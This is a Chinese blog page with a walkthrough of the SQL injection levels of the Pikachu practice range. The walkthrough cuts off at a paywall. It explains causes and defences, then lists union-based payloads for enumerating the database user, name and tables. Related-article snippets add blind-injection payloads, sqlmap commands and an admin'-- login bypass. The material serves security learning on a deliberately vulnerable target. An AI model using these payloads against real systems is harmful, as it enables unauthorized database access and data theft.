SQL注入-Pikachu靶场通关_pikachu靶场通关sql,重磅消息

最新推荐文章于 2024-06-13 14:29:56 发布
最新推荐文章于 2024-06-13 14:29:56 发布
阅读量880 收藏 17
点赞数 13
分类专栏: 2024年程序员学习 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61369275/article/details/137416019
版权

在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

数字型注入(post)

点击下拉框进行查询

image-20230820223216584

bp抓包获取信息

此题为post请求,说明请求内容在请求体当中

image-20230820223353554

发给重发器进行测试

payload:
id=1 and 1=1# 回显正常
id=1 and 1=2# 回显不正常
存在注入点

image-20230820223612771

回显不正常,说明带入数据库进行查询,执行了sql语句

image-20230820223657158

判断字段个数

payload:
id=1 order by 1# 回显正常
id=1 order by 2# 回显正常
id=1 order by 3# 回显不正常
说明有2列字段

image-20230820224102968

判断回显点

payload:
id=-1 union select 1,2#

image-20230820224349505

爆数据库

payload:
id=-1 union select user(),database()#
查询数据库的用户,当前数据库

version() 查看数据库版本
@@version_compile_os 查看操作系统

image-20230820224501592

爆数据表

payload:
id=-1 union select database(),table_name from information_schema.tables where table_schema=d

最低0.47元/天 解锁文章
苹果Android开发组
关注
  • 13
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入pikachu盲注练习
windStudyer的专栏
05-21 778
sql注入pikachu之盲注练习
PiKachuSql (SQL注入)通关 2022
av11566的博客
04-18 7931
遇到一个待测点: 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面显示结果。 2)输入的SQL语句是否能报错-能通过数据库的报错,看到数据库的一些语句痕迹(select username, password from user where id = 4 and 0#3)输入的SQL语句能否不报错-我们的语句能够成功闭合 2、什么类型的注入 3、语句是否能够被恶意修改--第二个要素 4、是否能够成功执行-->第三个要素 5、获取我们想要的数据。
pikachu-SQL】数字型注入(post)2022,超详细
weixin_46497491的博客
09-10 1520
pikachu-SQL】数字型注入(post)2022,超详细,web渗透,sql注入,渗透测试
pikachuSQL注入
qq_58091216的博客
11-04 2274
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
pikachu靶场sql注入)(宽字节注入和盲注)
weixin_54431413的博客
03-17 3776
一、宽字节注入 1.宽字节注入原理 宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\' 在这个靶场是addslashes(),这个函数对这些进行了转义 单引号(') 双引号(") 反斜杠(\) NULL 但是在下方设置编码时设置为了gbk编码, 利用反斜杠编码为%5c,这里用%df构成(連)字绕过对 ' 的转义 2.首先利用burp抓包 然后用 1%df' union selec
Pikachu系列——SQL
Zlirving_的博客
05-16 1444
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验四 —— SQL SQL概述 主要原因 网站程序存在可控传递参数,参数未进行过滤直接带入数据库查询,导致攻击者可通过传递恶意sql语句代码进行执行攻击 更多细节及包括以下实验的详情请移步至此!SQL注入总结小笔记 !   实验环境 我用的是phpstudy集成环境,一键搭环境 (如果端口没被占用还是比较顺利的) 靶场Pikachu靶场下载 工具:burpsuite 接下来: –>把下载下来的pik
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场通关
11-19
pikachu靶场通关
SQL注入pikachu靶场)(mysql数据库)数字型注入
weixin_54431413的博客
03-05 714
1.数字型注入 点击查询(submit),用burpsuite抓取请求(request)包 order by 判断有几列 union select 1,2 判断回显 然后利用mysql高版本中的默认库(information_schema)进行所有的数据库名查询 union select 1,schema_name from information_schema.schemata 根据得到的数据库名查询数据库下的表名 union select 1,table_name from .
pikachu SQL 注入(盲注)
weixin_60508121的博客
04-19 3660
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
重现pikachu sql数字型字符型注入(作业)
qq_43473164的博客
03-24 1017
重现pikachu sql数字型字符型注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字型注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4118
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
【大数据】Spark使用大全:下载安装、RDD操作、JAVA编程、SQL
最新发布
Joker_ZJN的博客
06-13 1079
一文详解Spark的使用
Mybatis 动态 SQL 语句
Zachyy的博客
06-10 752
MyBatis 是一个优秀的持久层框架,它支持定制化 SQL、存储过程以及高级映射。在 MyBatis 中,动态 SQL 是一个非常重要的特性,它允许我们。动态SQL技术是一种的功能,它存在的意义是为了解决拼接SQL语句字符串时的痛点问题。
mysql-线上常用运维sql-2
jll126的博客
06-11 410
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名和密码,点击登录按钮。 2. 在浏览器中按F12打开开发者工具,切换到Network选项卡。 3. 再次点击登录按钮,查看POST请求的数据包。 4. 将POST请求的数据包复制到Burp Suite等代理工具中。 5. 在代理工具中修改用户名为:admin'--,密码随意填写。 6. 发送修改后的数据包,即可成功登录管理员账户。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值